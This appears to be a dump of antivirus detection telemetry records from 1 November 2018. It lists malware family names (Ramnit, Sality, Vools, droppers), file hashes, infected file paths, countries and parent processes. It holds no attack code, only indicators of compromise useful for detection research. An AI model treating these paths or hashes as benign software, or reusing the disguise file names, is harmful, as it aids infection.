  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:36:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:46:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:10:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:40:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:03:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105802-5b5c7531', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bbbd5dbe\\AVSCAN-20181101-105744-59057944\\AVSCAN-20181101-105802-5B5C7531', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:58:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:16:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153716-49154720', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dc69a243\\AVSCAN-20181101-153638-439513BB\\AVSCAN-20181101-153716-49154720', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:37:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:26:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T05:56:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T10:24:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:23:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:41:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:43:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:37:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091902-f3267c37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-091843-EFD64E6A\\AVSCAN-20181101-091902-F3267C37', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:20:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:51:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:07:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:59:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='13bf13b9e7e3fca3a3eba08a2eaa469ff266a920bbc8069e270c43b61777c90e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries28.10.2018-4.available\\Avira\\13BF13B9E7E3FCA3A3EBA08A2EAA469FF266A920BBC8069E270C43B61777C90E', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='13bf13b9e7e3fca3a3eba08a2eaa469ff266a920bbc8069e270c43b61777c90e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:21:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jscript.dll', filepath='\\\\?\\E:\\暴风影音\\jscript.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='13dc69c57b8bc1243e3610c489b68a1a67d35c47cc85e358b71ea3f951c4ec9a', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:20:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jscript.dll', filepath='E:\\暴风影音\\jscript.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='13dc69c57b8bc1243e3610c489b68a1a67d35c47cc85e358b71ea3f951c4ec9a', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:10:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='13efd42c8c342922600b9a68ab4a62e950dcacfbcc27642b1b34a2289797f02e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries29.10.2018-25.categorizing\\13EFD42C8C342922600B9A68AB4A62E950DCACFBCC27642B1B34A2289797F02E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='13efd42c8c342922600b9a68ab4a62e950dcacfbcc27642b1b34a2289797f02e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T07:56:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005222-cf5b28c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2816e781\\AVSCAN-20181102-001608-8FA5C177\\AVSCAN-20181102-005222-CF5B28C5', filesize=280000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='140e47f1db1561d3d3a3ac40c64e74d8c3ea372024a8afda97338203a77fe1e4', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:52:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-013234-32244231', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2816e781\\AVSCAN-20181102-001608-8FA5C177\\AVSCAN-20181102-013234-32244231', filesize=280000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='140e47f1db1561d3d3a3ac40c64e74d8c3ea372024a8afda97338203a77fe1e4', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:32:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\autorun.exe', filesize=128000, name='TR/Dropper.Gen.#M300.#R3873'), hash='142187f2e53e6133e1a3f15c7e58f6758acb4f1864ade910537345f06c33b7e3', metadata=Row(cmdline='SCODEF:6348 CREDAT:78849 \\\\\\/prefetch:2', country='BE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=770608, timestamp='2018-11-01T11:20:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\autorun.exe', filesize=128000, name='TR/Dropper.Gen.#M300.#R3873'), hash='142187f2e53e6133e1a3f15c7e58f6758acb4f1864ade910537345f06c33b7e3', metadata=Row(cmdline='SCODEF:6348 CREDAT:78849 \\\\\\/prefetch:2', country='BE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=770608, timestamp='2018-11-01T11:20:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\autorun.exe', filesize=128000, name='TR/Dropper.Gen.#M300.#R3873'), hash='142187f2e53e6133e1a3f15c7e58f6758acb4f1864ade910537345f06c33b7e3', metadata=Row(cmdline='SCODEF:6348 CREDAT:78849 \\\\\\/prefetch:2', country='BE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=770608, timestamp='2018-11-01T11:20:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\autorun.exe', filesize=128000, name='TR/Dropper.Gen.#M300.#R3873'), hash='142187f2e53e6133e1a3f15c7e58f6758acb4f1864ade910537345f06c33b7e3', metadata=Row(cmdline='SCODEF:6348 CREDAT:78849 \\\\\\/prefetch:2', country='BE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=770608, timestamp='2018-11-01T11:20:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122123-bd1a5f6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9ea1a170\\AVSCAN-20181101-122106-BA9A3585\\AVSCAN-20181101-122123-BD1A5F6A', filesize=128000, name='TR/Dropper.Gen.#M1.#R1'), hash='142187f2e53e6133e1a3f15c7e58f6758acb4f1864ade910537345f06c33b7e3', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T11:21:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{06332CB9-78B5-49D8-A9B1-18CF5E84F1B7}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='14e1d424c84cb2c830a181196637b8888a1110e2928e3fa9e5b07f8c96931ff2', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1501b81bb21821e928edaeaa93c6ba45ff07c5d52eff1526f61bf2493a77d64c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\1501B81BB21821E928EDAEAA93C6BA45FF07C5D52EFF1526F61BF2493A77D64C', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='1501b81bb21821e928edaeaa93c6ba45ff07c5d52eff1526f61bf2493a77d64c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:56:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T03:38:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:22:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\NVIDIA Corporation\\Update Core\\NvBackend.exe', parentsize=2655520, timestamp='2018-11-01T00:38:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='birforms.exe', filepath='C:\\eBIRForms\\BIRForms.exe', filesize=30912000, name='W32/Sality.AT.#M1.#R1'), hash='1511090e5bb6ca6135675bf11411b7453f8934ab98e89eeab987cee50e479829', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:25:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ccuaiuabasicstubserver.exe', filepath='C:\\Program Files\\Common Files\\Siemens\\ace\\bin\\CCUAIUABasicStubServer.exe', filesize=200000, name='W32/Sality.AG.#M1.#R1'), hash='151cbe1c8d8bbcd6faaa3105c13ea3e6d0ad0cf556db1bf95906acafd6647232', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:45:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ccuaiuabasicstubserver.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\Siemens\\ace\\bin\\CCUAIUABasicStubServer.exe', filesize=200000, name='W32/Sality.AG.#M1.#R1'), hash='151cbe1c8d8bbcd6faaa3105c13ea3e6d0ad0cf556db1bf95906acafd6647232', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:15:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bcdemo5.exe', filepath='\\\\192.168.1.42\\project\\電腦設備\\johnny 文件檔\\桌面總成\\1553\\Ace545\\visual basic support\\Exe\\BCDEMO5.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3874'), hash='15355493e7e02379ffb11d0a9bc01e27aa09d678d43f5e9d2daf14fc6937334c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ccQAGANXX0yR3\\\\\\/o6.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:00:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090328-74b054b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3d18d1e\\AVSCAN-20181101-090226-693FEA15\\AVSCAN-20181101-090328-74B054B5', filesize=64000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='15355493e7e02379ffb11d0a9bc01e27aa09d678d43f5e9d2daf14fc6937334c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:02:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gsystem volume information.exe', filepath='E:\\gSystem Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:46:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gmisc.exe', filepath='E:\\gMISC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dcim.exe', filepath='E:\\DCIM\\DCIM.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gautorun.inf.exe', filepath='E:\\gautorun.inf.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='misc.exe', filepath='E:\\MISC\\MISC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='g100canon.exe', filepath='E:\\DCIM\\g100CANON.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='misc.exe', filepath='E:\\MISC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='g100canon.exe', filepath='E:\\DCIM\\g100CANON.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gdcim.exe', filepath='E:\\gDCIM.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='100canon.exe', filepath='E:\\DCIM\\100CANON.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='protection for autorun.exe', filepath='E:\\autorun.inf\\Protection for Autorun.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gprotection for autorun.exe', filepath='E:\\autorun.inf\\gProtection for Autorun.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='geosmisc.exe', filepath='E:\\DCIM\\gEOSMISC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.exe', filepath='E:\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.inf.exe', filepath='E:\\autorun.inf\\autorun.inf.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.inf.exe', filepath='E:\\autorun.inf.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dcim.exe', filepath='E:\\DCIM.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eosmisc.exe', filepath='E:\\DCIM\\EOSMISC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:06Z'), dt=datetime.date(2018, 11, 1)),
